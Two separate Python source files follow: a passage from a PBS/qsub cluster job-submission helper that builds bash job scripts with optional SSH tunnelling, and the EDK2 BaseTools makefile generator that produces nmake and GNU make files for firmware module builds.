# No point in creating a job that doesn't run any scripts
return None
# Optionally limit the number of jobs
if self._max_jobs is not None:
# If we haven't yet, get the current number of running jobs,
# so we don't double up by running this repeatedly
if not self._checked_running_jobs:
result = subprocess.run(['qjobs'], stdout=subprocess.PIPE, universal_newlines=True)
re_match = re.search('(\\d+) running jobs found', result.stdout)
if re_match is not None:
num_jobs = int(re_match.groups(default='0')[0])
self._max_jobs -= num_jobs
self._checked_running_jobs = True
# Don't submit more than the max jobs, if a limit is set
if self._max_jobs <= 0:
# Cannot submit any more jobs
logging.getLogger(__name__).info("Failed to submit job, job limit reached")
return None
self._max_jobs -= 1
# Choose a job name and a unique file
job_name = self._name_prefix + job_name
job_file_path = self._job_folder / (job_name + '.sub')
offset = 0
while job_file_path.exists():
offset += 1
job_file_path = self._job_folder / (job_name + '_{0}.sub'.format(offset))
lines = ['#!/bin/bash -l']
# basic job meta-information
if not isinstance(expected_duration, str) or not re.match('^[0-9]+:[0-9]{2}:[0-9]{2}$', expected_duration):
expected_duration = '1:00:00'
if not isinstance(memory_requirements, str) or not re.match('^[0-9]+[TGMK]B$', memory_requirements):
memory_requirements = '3GB'
lines.append(JOB_ARGS_TEMPLATE.format(
name=job_name,
time=expected_duration,
mem=memory_requirements,
cpus=num_cpus
).strip())
# Additional args based on the number of GPUs
if num_gpus > 0:
lines.append(GPU_ARGS_TEMPLATE.format(gpus=num_gpus).strip())
elif int(memory_requirements.rstrip('MGB')) > 125:
lines.append('#PBS -l cputype=E5-2680v3')
# Actually assemble the script commands, line group by line group
if self._environment is not None:
lines.append('source ' + quote(str(self._environment)))
# change to the current working dir
lines.append('cd {0} || exit'.format(quote(getcwd())))
# Activate an SSH tunnel, if required
port = None
if self._use_ssh:
# Find a port *we* are not using
port = self._ssh_current_port
while port <= self._ssh_max_port and any(True for _ in self._job_folder.glob('*-{0}.ssh.pid'.format(port))):
port += 1
self._ssh_current_port = port + 1
lines.append(SSH_TUNNEL_PREFIX.format(
job_name=job_name,
username=self._ssh_username,
ssh_key=self._ssh_key,
local_port=port,
hostname=self._ssh_host,
job_folder=self._job_folder
).strip())
# Add the actual script commands
for script, script_args_builder in scripts:
script_args = script_args_builder(self._config_path, port)
lines.append('python {script} {args}'.format(
script=quote(str(script)),
args=' '.join([quote(arg) for arg in script_args])
))
# Add commands for closing the SSH tunnel, if we have one
if self._use_ssh:
lines.append(SSH_TUNNEL_SUFFIX.format(
job_name=job_name, local_port=port, job_folder=self._job_folder).strip())
# Clean up the job file when we're done
lines.append("rm {0}".format(job_file_path))
# Write the job file
with open(job_file_path, 'w+') as job_file:
job_file.write('\n'.join(lines))
logging.getLogger(__name__).info("Submitting job file {0}".format(job_file_path))
result = subprocess.run(['qsub', job_file_path], stdout=subprocess.PIPE, universal_newlines=True)
match_result = re.search('(\\d+)', result.stdout)
if match_result is None:
raise RuntimeError(f"Failed to find JobId in ouput of qsub call, probably failed to submit job.\n"
f"Output was:\n{result.stdout}")
job_id = match_result.group()
return int(job_id)
def task_args_builder(task: Task, config, port: int = None):
"""
Make the command line arguments for running a task
Will use partials to bind the values of task and allow_write
:param task:
:param config:
:param port:
:return:
"""
args = ['--config', str(config)]
if port is not None:
args += ['--mongodb_port', str(port)]
args.append(str(task.pk))
return args
def parse_memory_requirements(memory: str):
"""
Turn a memory requirements string to a size in KB
:param memory:
:return:
"""
memory = memory.upper()
if memory.endswith('GB'):
return 1024 * 1024 * int(memory.rstrip('GMKB'))
elif memory.endswith('MB'):
return 1024 * int(memory.rstrip('GMKB'))
return int(memory.rstrip('GMKB'))
def merge_expected_durations(durations: typing.Iterable[str]) -> str:
"""
Join together the estimated times of multiple tasks into a combined time
:param durations:
:return:
"""
hours = 0
minutes = 0
seconds = 0
for duration in durations:
parts = duration.split(':')
if len(parts) >= 3:
hours += int(parts[0])
minutes += int(parts[1])
seconds += int(parts[2])
minutes += seconds // 60
seconds = seconds % 60
hours += minutes // 60
minutes = minutes % 60
return "{0:02}:{1:02}:{2:02}".format(hours, minutes, seconds)
def quote(string: str) -> str:
"""
Wrap a string with quotes iff it contains a space. Used for interacting with command line scripts.
:param string:
:return:
"""
if ' ' in string:
return '"' + string + '"'
return string
|
## @file
# Create makefile for MS nmake and GNU make
#
# Copyright (c) 2007 - 2020, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2020, ARM Limited. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Import Modules
#
from __future__ import absolute_import
import Common.LongFilePathOs as os
import sys
import string
import re
import os.path as path
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
from Common.BuildToolError import *
from Common.Misc import *
from Common.StringUtils import *
from .BuildEngine import *
import Common.GlobalData as GlobalData
from collections import OrderedDict
from Common.DataType import TAB_COMPILER_MSFT
## Regular expression for finding header file inclusions
gIncludePattern = re.compile(r"^[ \t]*[#%]?[ \t]*include(?:[ \t]*(?:\\(?:\r\n|\r|\n))*[ \t]*)*(?:\(?[\"<]?[ \t]*)([-\w.\\/() \t]+)(?:[ \t]*[\">]?\)?)", re.MULTILINE | re.UNICODE | re.IGNORECASE)
## Regular expression for matching macro used in header file inclusion
gMacroPattern = re.compile("([_A-Z][_A-Z0-9]*)[ \t]*\((.+)\)", re.UNICODE)
gIsFileMap = {}
## pattern for include style in Edk.x code
gProtocolDefinition = "Protocol/%(HeaderKey)s/%(HeaderKey)s.h"
gGuidDefinition = "Guid/%(HeaderKey)s/%(HeaderKey)s.h"
gArchProtocolDefinition = "ArchProtocol/%(HeaderKey)s/%(HeaderKey)s.h"
gPpiDefinition = "Ppi/%(HeaderKey)s/%(HeaderKey)s.h"
gIncludeMacroConversion = {
"EFI_PROTOCOL_DEFINITION" : gProtocolDefinition,
"EFI_GUID_DEFINITION" : gGuidDefinition,
"EFI_ARCH_PROTOCOL_DEFINITION" : gArchProtocolDefinition,
"EFI_PROTOCOL_PRODUCER" : gProtocolDefinition,
"EFI_PROTOCOL_CONSUMER" : gProtocolDefinition,
"EFI_PROTOCOL_DEPENDENCY" : gProtocolDefinition,
"EFI_ARCH_PROTOCOL_PRODUCER" : gArchProtocolDefinition,
"EFI_ARCH_PROTOCOL_CONSUMER" : gArchProtocolDefinition,
"EFI_ARCH_PROTOCOL_DEPENDENCY" : gArchProtocolDefinition,
"EFI_PPI_DEFINITION" : gPpiDefinition,
"EFI_PPI_PRODUCER" : gPpiDefinition,
"EFI_PPI_CONSUMER" : gPpiDefinition,
"EFI_PPI_DEPENDENCY" : gPpiDefinition,
}
NMAKE_FILETYPE = "nmake"
GMAKE_FILETYPE = "gmake"
WIN32_PLATFORM = "win32"
POSIX_PLATFORM = "posix"
## BuildFile class
#
# This base class encapsules build file and its generation. It uses template to generate
# the content of build file. The content of build file will be got from AutoGen objects.
#
class BuildFile(object):
## template used to generate the build file (i.e. makefile if using make)
_TEMPLATE_ = TemplateString('')
_DEFAULT_FILE_NAME_ = "Makefile"
## default file name for each type of build file
_FILE_NAME_ = {
NMAKE_FILETYPE : "Makefile",
GMAKE_FILETYPE : "GNUmakefile"
}
# Get Makefile name.
def getMakefileName(self):
if not self._FileType:
return self._DEFAULT_FILE_NAME_
else:
return self._FILE_NAME_[self._FileType]
## Fixed header string for makefile
_MAKEFILE_HEADER = '''#
# DO NOT EDIT
# This file is auto-generated by build utility
#
# Module Name:
#
# %s
#
# Abstract:
#
# Auto-generated makefile for building modules, libraries or platform
#
'''
## Header string for each type of build file
_FILE_HEADER_ = {
NMAKE_FILETYPE : _MAKEFILE_HEADER % _FILE_NAME_[NMAKE_FILETYPE],
GMAKE_FILETYPE : _MAKEFILE_HEADER % _FILE_NAME_[GMAKE_FILETYPE]
}
## shell commands which can be used in build file in the form of macro
# $(CP) copy file command
# $(MV) move file command
# $(RM) remove file command
# $(MD) create dir command
# $(RD) remove dir command
#
_SHELL_CMD_ = {
WIN32_PLATFORM : {
"CP" : "copy /y",
"MV" : "move /y",
"RM" : "del /f /q",
"MD" : "mkdir",
"RD" : "rmdir /s /q",
},
POSIX_PLATFORM : {
"CP" : "cp -f",
"MV" : "mv -f",
"RM" : "rm -f",
"MD" : "mkdir -p",
"RD" : "rm -r -f",
}
}
## directory separator
_SEP_ = {
WIN32_PLATFORM : "\\",
POSIX_PLATFORM : "/"
}
## directory creation template
_MD_TEMPLATE_ = {
WIN32_PLATFORM : 'if not exist %(dir)s $(MD) %(dir)s',
POSIX_PLATFORM : "$(MD) %(dir)s"
}
## directory removal template
_RD_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(dir)s $(RD) %(dir)s',
POSIX_PLATFORM : "$(RD) %(dir)s"
}
## cp if exist
_CP_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(Src)s $(CP) %(Src)s %(Dst)s',
POSIX_PLATFORM : "test -f %(Src)s && $(CP) %(Src)s %(Dst)s"
}
_CD_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(dir)s cd %(dir)s',
POSIX_PLATFORM : "test -e %(dir)s && cd %(dir)s"
}
_MAKE_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(file)s "$(MAKE)" $(MAKE_FLAGS) -f %(file)s',
POSIX_PLATFORM : 'test -e %(file)s && "$(MAKE)" $(MAKE_FLAGS) -f %(file)s'
}
_INCLUDE_CMD_ = {
NMAKE_FILETYPE : '!INCLUDE',
GMAKE_FILETYPE : "include"
}
_INC_FLAG_ = {TAB_COMPILER_MSFT : "/I", "GCC" : "-I", "INTEL" : "-I", "RVCT" : "-I", "NASM" : "-I"}
## Constructor of BuildFile
#
# @param AutoGenObject Object of AutoGen class
#
def __init__(self, AutoGenObject):
self._AutoGenObject = AutoGenObject
MakePath = AutoGenObject.BuildOption.get('MAKE', {}).get('PATH')
if not MakePath:
self._FileType = ""
elif "nmake" in MakePath:
self._FileType = NMAKE_FILETYPE
else:
self._FileType = "gmake"
if sys.platform == "win32":
self._Platform = WIN32_PLATFORM
else:
self._Platform = POSIX_PLATFORM
## Create build file.
#
# Only nmake and gmake are supported.
#
# @retval TRUE The build file is created or re-created successfully.
# @retval FALSE The build file exists and is the same as the one to be generated.
#
def Generate(self):
FileContent = self._TEMPLATE_.Replace(self._TemplateDict)
FileName = self.getMakefileName()
if not os.path.exists(os.path.join(self._AutoGenObject.MakeFileDir, "deps.txt")):
with open(os.path.join(self._AutoGenObject.MakeFileDir, "deps.txt"),"w+") as fd:
fd.write("")
if not os.path.exists(os.path.join(self._AutoGenObject.MakeFileDir, "dependency")):
with open(os.path.join(self._AutoGenObject.MakeFileDir, "dependency"),"w+") as fd:
fd.write("")
if not os.path.exists(os.path.join(self._AutoGenObject.MakeFileDir, "deps_target")):
with open(os.path.join(self._AutoGenObject.MakeFileDir, "deps_target"),"w+") as fd:
fd.write("")
return SaveFileOnChange(os.path.join(self._AutoGenObject.MakeFileDir, FileName), FileContent, False)
## Return a list of directory creation command string
#
# @param DirList The list of directory to be created
#
# @retval list The directory creation command list
#
def GetCreateDirectoryCommand(self, DirList):
return [self._MD_TEMPLATE_[self._Platform] % {'dir':Dir} for Dir in DirList]
## Return a list of directory removal command string
#
# @param DirList The list of directory to be removed
#
# @retval list The directory removal command list
#
def GetRemoveDirectoryCommand(self, DirList):
return [self._RD_TEMPLATE_[self._Platform] % {'dir':Dir} for Dir in DirList]
def PlaceMacro(self, Path, MacroDefinitions=None):
if Path.startswith("$("):
return Path
else:
if MacroDefinitions is None:
MacroDefinitions = {}
PathLength = len(Path)
for MacroName in MacroDefinitions:
MacroValue = MacroDefinitions[MacroName]
MacroValueLength = len(MacroValue)
if MacroValueLength == 0:
continue
if MacroValueLength <= PathLength and Path.startswith(MacroValue):
Path = "$(%s)%s" % (MacroName, Path[MacroValueLength:])
break
return Path
## ModuleMakefile class
#
# This class encapsules makefie and its generation for module. It uses template to generate
# the content of makefile. The content of makefile will be got from ModuleAutoGen object.
#
class ModuleMakefile(BuildFile):
## template used to generate the makefile for module
_TEMPLATE_ = TemplateString('''\
${makefile_header}
#
# Platform Macro Definition
#
PLATFORM_NAME = ${platform_name}
PLATFORM_GUID = ${platform_guid}
PLATFORM_VERSION = ${platform_version}
PLATFORM_RELATIVE_DIR = ${platform_relative_directory}
PLATFORM_DIR = ${platform_dir}
PLATFORM_OUTPUT_DIR = ${platform_output_directory}
#
# Module Macro Definition
#
MODULE_NAME = ${module_name}
MODULE_GUID = ${module_guid}
MODULE_NAME_GUID = ${module_name_guid}
MODULE_VERSION = ${module_version}
MODULE_TYPE = ${module_type}
MODULE_FILE = ${module_file}
MODULE_FILE_BASE_NAME = ${module_file_base_name}
BASE_NAME = $(MODULE_NAME)
MODULE_RELATIVE_DIR = ${module_relative_directory}
PACKAGE_RELATIVE_DIR = ${package_relative_directory}
MODULE_DIR = ${module_dir}
FFS_OUTPUT_DIR = ${ffs_output_directory}
MODULE_ENTRY_POINT = ${module_entry_point}
ARCH_ENTRY_POINT = ${arch_entry_point}
IMAGE_ENTRY_POINT = ${image_entry_point}
${BEGIN}${module_extra_defines}
${END}
#
# Build Configuration Macro Definition
#
ARCH = ${architecture}
TOOLCHAIN = ${toolchain_tag}
TOOLCHAIN_TAG = ${toolchain_tag}
TARGET = ${build_target}
#
# Build Directory Macro Definition
#
# PLATFORM_BUILD_DIR = ${platform_build_directory}
BUILD_DIR = ${platform_build_directory}
BIN_DIR = $(BUILD_DIR)${separator}${architecture}
LIB_DIR = $(BIN_DIR)
MODULE_BUILD_DIR = ${module_build_directory}
OUTPUT_DIR = ${module_output_directory}
DEBUG_DIR = ${module_debug_directory}
DEST_DIR_OUTPUT = $(OUTPUT_DIR)
DEST_DIR_DEBUG = $(DEBUG_DIR)
#
# Shell Command Macro
#
${BEGIN}${shell_command_code} = ${shell_command}
${END}
#
# Tools definitions specific to this module
#
${BEGIN}${module_tool_definitions}
${END}
MAKE_FILE = ${makefile_path}
#
# Build Macro
#
${BEGIN}${file_macro}
${END}
#
# Overridable Target Macro Definitions
#
FORCE_REBUILD = force_build
INIT_TARGET = init
PCH_TARGET =
BC_TARGET = ${BEGIN}${backward_compatible_target} ${END}
CODA_TARGET = ${BEGIN}${remaining_build_target} \\
${END}
#
# Default target, which will build dependent libraries in addition to source files
#
all: mbuild
#
# Target used when called from platform makefile, which will bypass the build of dependent libraries
#
pbuild: $(INIT_TARGET) $(BC_TARGET) $(PCH_TARGET) $(CODA_TARGET)
#
# ModuleTarget
#
mbuild: $(INIT_TARGET) $(BC_TARGET) gen_libs $(PCH_TARGET) $(CODA_TARGET)
#
# Build Target used in multi-thread build mode, which will bypass the init and gen_libs targets
#
tbuild: $(BC_TARGET) $(PCH_TARGET) $(CODA_TARGET)
#
# Phony target which is used to force executing commands for a target
#
force_build:
\t-@
#
# Target to update the FD
#
fds: mbuild gen_fds
#
# Initialization target: print build information and create necessary directories
#
init: info dirs
info:
\t-@echo Building ... $(MODULE_DIR)${separator}$(MODULE_FILE) [$(ARCH)]
dirs:
${BEGIN}\t-@${create_directory_command}\n${END}
strdefs:
\t-@$(CP) $(DEBUG_DIR)${separator}AutoGen.h $(DEBUG_DIR)${separator}$(MODULE_NAME)StrDefs.h
#
# GenLibsTarget
#
gen_libs:
\t${BEGIN}@"$(MAKE)" $(MAKE_FLAGS) -f ${dependent_library_build_directory}${separator}${makefile_name}
\t${END}@cd $(MODULE_BUILD_DIR)
#
# Build Flash Device Image
#
gen_fds:
\t@"$(MAKE)" $(MAKE_FLAGS) -f $(BUILD_DIR)${separator}${makefile_name} fds
\t@cd $(MODULE_BUILD_DIR)
${INCLUDETAG}
#
# Individual Object Build Targets
#
${BEGIN}${file_build_target}
${END}
#
# clean all intermediate files
#
clean:
\t${BEGIN}${clean_command}
\t${END}\t$(RM) AutoGenTimeStamp
#
# clean all generated files
#
cleanall:
${BEGIN}\t${cleanall_command}
${END}\t$(RM) *.pdb *.idb > NUL 2>&1
\t$(RM) $(BIN_DIR)${separator}$(MODULE_NAME).efi
\t$(RM) AutoGenTimeStamp
#
# clean all dependent libraries built
#
cleanlib:
\t${BEGIN}-@${library_build_command} cleanall
\t${END}@cd $(MODULE_BUILD_DIR)\n\n''')
_FILE_MACRO_TEMPLATE = TemplateString("${macro_name} = ${BEGIN} \\\n ${source_file}${END}\n")
_BUILD_TARGET_TEMPLATE = TemplateString("${BEGIN}${target} : ${deps}\n${END}\t${cmd}\n")
## Constructor of ModuleMakefile
#
# @param ModuleAutoGen Object of ModuleAutoGen class
#
def __init__(self, ModuleAutoGen):
BuildFile.__init__(self, ModuleAutoGen)
self.PlatformInfo = self._AutoGenObject.PlatformInfo
self.ResultFileList = []
self.IntermediateDirectoryList = ["$(DEBUG_DIR)", "$(OUTPUT_DIR)"]
self.FileBuildTargetList = [] # [(src, target string)]
self.BuildTargetList = [] # [target string]
self.PendingBuildTargetList = [] # [FileBuildRule objects]
self.CommonFileDependency = []
self.FileListMacros = {}
self.ListFileMacros = {}
self.ObjTargetDict = OrderedDict()
self.FileCache = {}
self.LibraryBuildCommandList = []
self.LibraryFileList = []
self.LibraryMakefileList = []
self.LibraryBuildDirectoryList = []
self.SystemLibraryList = []
self.Macros = OrderedDict()
self.Macros["OUTPUT_DIR" ] = self._AutoGenObject.Macros["OUTPUT_DIR"]
self.Macros["DEBUG_DIR" ] = self._AutoGenObject.Macros["DEBUG_DIR"]
self.Macros["MODULE_BUILD_DIR"] = self._AutoGenObject.Macros["MODULE_BUILD_DIR"]
self.Macros["BIN_DIR" ] = self._AutoGenObject.Macros["BIN_DIR"]
self.Macros["BUILD_DIR" ] = self._AutoGenObject.Macros["BUILD_DIR"]
self.Macros["WORKSPACE" ] = self._AutoGenObject.Macros["WORKSPACE"]
self.Macros["FFS_OUTPUT_DIR" ] = self._AutoGenObject.Macros["FFS_OUTPUT_DIR"]
self.GenFfsList = ModuleAutoGen.GenFfsList
self.MacroList = ['FFS_OUTPUT_DIR', 'MODULE_GUID', 'OUTPUT_DIR']
self.FfsOutputFileList = []
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
MyAgo = self._AutoGenObject
Separator = self._SEP_[self._Platform]
# break build if no source files and binary files are found
if len(MyAgo.SourceFileList) == 0 and len(MyAgo.BinaryFileList) == 0:
EdkLogger.error("build", AUTOGEN_ERROR, "No files to be built in module [%s, %s, %s]"
% (MyAgo.BuildTarget, MyAgo.ToolChain, MyAgo.Arch),
ExtraData="[%s]" % str(MyAgo))
# convert dependent libraries to build command
self.ProcessDependentLibrary()
if len(MyAgo.Module.ModuleEntryPointList) > 0:
ModuleEntryPoint = MyAgo.Module.ModuleEntryPointList[0]
else:
ModuleEntryPoint = "_ModuleEntryPoint"
ArchEntryPoint = ModuleEntryPoint
if MyAgo.Arch == "EBC":
# EBC compiler always use "EfiStart" as entry point. Only applies to EdkII modules
ImageEntryPoint = "EfiStart"
else:
# EdkII modules always use "_ModuleEntryPoint" as entry point
ImageEntryPoint = "_ModuleEntryPoint"
for k, v in MyAgo.Module.Defines.items():
if k not in MyAgo.Macros:
MyAgo.Macros[k] = v
if 'MODULE_ENTRY_POINT' not in MyAgo.Macros:
MyAgo.Macros['MODULE_ENTRY_POINT'] = ModuleEntryPoint
if 'ARCH_ENTRY_POINT' not in MyAgo.Macros:
MyAgo.Macros['ARCH_ENTRY_POINT'] = ArchEntryPoint
if 'IMAGE_ENTRY_POINT' not in MyAgo.Macros:
MyAgo.Macros['IMAGE_ENTRY_POINT'] = ImageEntryPoint
PCI_COMPRESS_Flag = False
for k, v in MyAgo.Module.Defines.items():
if 'PCI_COMPRESS' == k and 'TRUE' == v:
PCI_COMPRESS_Flag = True
# tools definitions
ToolsDef = []
IncPrefix = self._INC_FLAG_[MyAgo.ToolChainFamily]
for Tool in MyAgo.BuildOption:
for Attr in MyAgo.BuildOption[Tool]:
Value = MyAgo.BuildOption[Tool][Attr]
if Attr == "FAMILY":
continue
elif Attr == "PATH":
ToolsDef.append("%s = %s" % (Tool, Value))
else:
# Don't generate MAKE_FLAGS in makefile. It's put in environment variable.
if Tool == "MAKE":
continue
# Remove duplicated include path, if any
if Attr == "FLAGS":
Value = RemoveDupOption(Value, IncPrefix, MyAgo.IncludePathList)
if Tool == "OPTROM" and PCI_COMPRESS_Flag:
ValueList = Value.split()
if ValueList:
for i, v in enumerate(ValueList):
if '-e' == v:
ValueList[i] = '-ec'
Value = ' '.join(ValueList)
ToolsDef.append("%s_%s = %s" % (Tool, Attr, Value))
ToolsDef.append("")
# generate the Response file and Response flag
RespDict = self.CommandExceedLimit()
RespFileList = os.path.join(MyAgo.OutputDir, 'respfilelist.txt')
if RespDict:
RespFileListContent = ''
for Resp in RespDict:
RespFile = os.path.join(MyAgo.OutputDir, str(Resp).lower() + '.txt')
StrList = RespDict[Resp].split(' ')
UnexpandMacro = []
NewStr = []
for Str in StrList:
if '$' in Str or '-MMD' in Str or '-MF' in Str:
UnexpandMacro.append(Str)
else:
NewStr.append(Str)
UnexpandMacroStr = ' '.join(UnexpandMacro)
NewRespStr = ' '.join(NewStr)
SaveFileOnChange(RespFile, NewRespStr, False)
ToolsDef.append("%s = %s" % (Resp, UnexpandMacroStr + ' @' + RespFile))
RespFileListContent += '@' + RespFile + TAB_LINE_BREAK
RespFileListContent += NewRespStr + TAB_LINE_BREAK
SaveFileOnChange(RespFileList, RespFileListContent, False)
else:
if os.path.exists(RespFileList):
os.remove(RespFileList)
# convert source files and binary files to build targets
self.ResultFileList = [str(T.Target) for T in MyAgo.CodaTargetList]
if len(self.ResultFileList) == 0 and len(MyAgo.SourceFileList) != 0:
EdkLogger.error("build", AUTOGEN_ERROR, "Nothing to build",
ExtraData="[%s]" % str(MyAgo))
self.ProcessBuildTargetList()
self.ParserGenerateFfsCmd()
# Generate macros used to represent input files
FileMacroList = [] # macro name = file list
for FileListMacro in self.FileListMacros:
FileMacro = self._FILE_MACRO_TEMPLATE.Replace(
{
"macro_name" : FileListMacro,
"source_file" : self.FileListMacros[FileListMacro]
}
)
FileMacroList.append(FileMacro)
# INC_LIST is special
FileMacro = ""
IncludePathList = []
for P in MyAgo.IncludePathList:
IncludePathList.append(IncPrefix + self.PlaceMacro(P, self.Macros))
if FileBuildRule.INC_LIST_MACRO in self.ListFileMacros:
self.ListFileMacros[FileBuildRule.INC_LIST_MACRO].append(IncPrefix + P)
FileMacro += self._FILE_MACRO_TEMPLATE.Replace(
{
"macro_name" : "INC",
"source_file" : IncludePathList
}
)
FileMacroList.append(FileMacro)
# Add support when compiling .nasm source files
IncludePathList = []
asmsource = [item for item in MyAgo.SourceFileList if item.File.upper().endswith((".NASM",".ASM",".NASMB","S"))]
if asmsource:
for P in MyAgo.IncludePathList:
IncludePath = self._INC_FLAG_['NASM'] + self.PlaceMacro(P, self.Macros)
if IncludePath.endswith(os.sep):
IncludePath = IncludePath.rstrip(os.sep)
# When compiling .nasm files, need to add a literal backslash at each path.
# In nmake makfiles, a trailing literal backslash must be escaped with a caret ('^').
# It is otherwise replaced with a space (' '). This is not necessary for GNU makfefiles.
if P == MyAgo.IncludePathList[-1] and self._Platform == WIN32_PLATFORM and self._FileType == NMAKE_FILETYPE:
IncludePath = ''.join([IncludePath, '^', os.sep])
else:
IncludePath = os.path.join(IncludePath, '')
IncludePathList.append(IncludePath)
FileMacroList.append(self._FILE_MACRO_TEMPLATE.Replace({"macro_name": "NASM_INC", "source_file": IncludePathList}))
# Generate macros used to represent files containing list of input files
for ListFileMacro in self.ListFileMacros:
ListFileName = os.path.join(MyAgo.OutputDir, "%s.lst" % ListFileMacro.lower()[:len(ListFileMacro) - 5])
FileMacroList.append("%s = %s" % (ListFileMacro, ListFileName))
SaveFileOnChange(
ListFileName,
"\n".join(self.ListFileMacros[ListFileMacro]),
False
)
# Generate objlist used to create .obj file
for Type in self.ObjTargetDict:
NewLine = ' '.join(list(self.ObjTargetDict[Type]))
FileMacroList.append("OBJLIST_%s = %s" % (list(self.ObjTargetDict.keys()).index(Type), NewLine))
BcTargetList = []
MakefileName = self.getMakefileName()
LibraryMakeCommandList = []
for D in self.LibraryBuildDirectoryList:
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":os.path.join(D, MakefileName)}
LibraryMakeCommandList.append(Command)
package_rel_dir = MyAgo.SourceDir
current_dir = self.Macros["WORKSPACE"]
found = False
while not found and os.sep in package_rel_dir:
index = package_rel_dir.index(os.sep)
current_dir = mws.join(current_dir, package_rel_dir[:index])
if os.path.exists(current_dir):
for fl in os.listdir(current_dir):
if fl.endswith('.dec'):
found = True
break
package_rel_dir = package_rel_dir[index + 1:]
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(MODULE_BUILD_DIR)", MakefileName),
"makefile_name" : MakefileName,
"platform_name" : self.PlatformInfo.Name,
"platform_guid" : self.PlatformInfo.Guid,
"platform_version" : self.PlatformInfo.Version,
"platform_relative_directory": self.PlatformInfo.SourceDir,
"platform_output_directory" : self.PlatformInfo.OutputDir,
"ffs_output_directory" : MyAgo.Macros["FFS_OUTPUT_DIR"],
"platform_dir" : MyAgo.Macros["PLATFORM_DIR"],
"module_name" : MyAgo.Name,
"module_guid" : MyAgo.Guid,
"module_name_guid" : MyAgo.UniqueBaseName,
"module_version" : MyAgo.Version,
"module_type" : MyAgo.ModuleType,
"module_file" : MyAgo.MetaFile.Name,
"module_file_base_name" : MyAgo.MetaFile.BaseName,
"module_relative_directory" : MyAgo.SourceDir,
"module_dir" : mws.join (self.Macros["WORKSPACE"], MyAgo.SourceDir),
"package_relative_directory": package_rel_dir,
"module_extra_defines" : ["%s = %s" % (k, v) for k, v in MyAgo.Module.Defines.items()],
"architecture" : MyAgo.Arch,
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"platform_build_directory" : self.PlatformInfo.BuildDir,
"module_build_directory" : MyAgo.BuildDir,
"module_output_directory" : MyAgo.OutputDir,
"module_debug_directory" : MyAgo.DebugDir,
"separator" : Separator,
"module_tool_definitions" : ToolsDef,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
"module_entry_point" : ModuleEntryPoint,
"image_entry_point" : ImageEntryPoint,
"arch_entry_point" : ArchEntryPoint,
"remaining_build_target" : self.ResultFileList,
"common_dependency_file" : self.CommonFileDependency,
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"clean_command" : self.GetRemoveDirectoryCommand(["$(OUTPUT_DIR)"]),
"cleanall_command" : self.GetRemoveDirectoryCommand(["$(DEBUG_DIR)", "$(OUTPUT_DIR)"]),
"dependent_library_build_directory" : self.LibraryBuildDirectoryList,
"library_build_command" : LibraryMakeCommandList,
"file_macro" : FileMacroList,
"file_build_target" : self.BuildTargetList,
"backward_compatible_target": BcTargetList,
"INCLUDETAG" : "\n".join([self._INCLUDE_CMD_[self._FileType] + " " + os.path.join("$(MODULE_BUILD_DIR)","dependency"),
self._INCLUDE_CMD_[self._FileType] + " " + os.path.join("$(MODULE_BUILD_DIR)","deps_target")
])
}
return MakefileTemplateDict
def ParserGenerateFfsCmd(self):
#Add Ffs cmd to self.BuildTargetList
OutputFile = ''
DepsFileList = []
for Cmd in self.GenFfsList:
if Cmd[2]:
for CopyCmd in Cmd[2]:
Src, Dst = CopyCmd
Src = self.ReplaceMacro(Src)
Dst = self.ReplaceMacro(Dst)
if Dst not in self.ResultFileList:
self.ResultFileList.append(Dst)
if '%s :' %(Dst) not in self.BuildTargetList:
self.BuildTargetList.append("%s : %s" %(Dst,Src))
self.BuildTargetList.append('\t' + self._CP_TEMPLATE_[self._Platform] %{'Src': Src, 'Dst': Dst})
FfsCmdList = Cmd[0]
for index, Str in enumerate(FfsCmdList):
if '-o' == Str:
OutputFile = FfsCmdList[index + 1]
if '-i' == Str or "-oi" == Str:
if DepsFileList == []:
DepsFileList = [FfsCmdList[index + 1]]
else:
DepsFileList.append(FfsCmdList[index + 1])
DepsFileString = ' '.join(DepsFileList).strip()
if DepsFileString == '':
continue
OutputFile = self.ReplaceMacro(OutputFile)
self.ResultFileList.append(OutputFile)
DepsFileString = self.ReplaceMacro(DepsFileString)
self.BuildTargetList.append('%s : %s' % (OutputFile, DepsFileString))
CmdString = ' '.join(FfsCmdList).strip()
CmdString = self.ReplaceMacro(CmdString)
self.BuildTargetList.append('\t%s' % CmdString)
self.ParseSecCmd(DepsFileList, Cmd[1])
for SecOutputFile, SecDepsFile, SecCmd in self.FfsOutputFileList :
self.BuildTargetList.append('%s : %s' % (self.ReplaceMacro(SecOutputFile), self.ReplaceMacro(SecDepsFile)))
self.BuildTargetList.append('\t%s' % self.ReplaceMacro(SecCmd))
self.FfsOutputFileList = []
def ParseSecCmd(self, OutputFileList, CmdTuple):
for OutputFile in OutputFileList:
for SecCmdStr in CmdTuple:
SecDepsFileList = []
SecCmdList = SecCmdStr.split()
CmdName = SecCmdList[0]
for index, CmdItem in enumerate(SecCmdList):
if '-o' == CmdItem and OutputFile == SecCmdList[index + 1]:
index = index + 1
while index + 1 < len(SecCmdList):
if not SecCmdList[index+1].startswith('-'):
SecDepsFileList.append(SecCmdList[index + 1])
index = index + 1
if CmdName == 'Trim':
SecDepsFileList.append(os.path.join('$(DEBUG_DIR)', os.path.basename(OutputFile).replace('offset', 'efi')))
if OutputFile.endswith('.ui') or OutputFile.endswith('.ver'):
SecDepsFileList.append(os.path.join('$(MODULE_DIR)', '$(MODULE_FILE)'))
self.FfsOutputFileList.append((OutputFile, ' '.join(SecDepsFileList), SecCmdStr))
if len(SecDepsFileList) > 0:
self.ParseSecCmd(SecDepsFileList, CmdTuple)
break
else:
continue
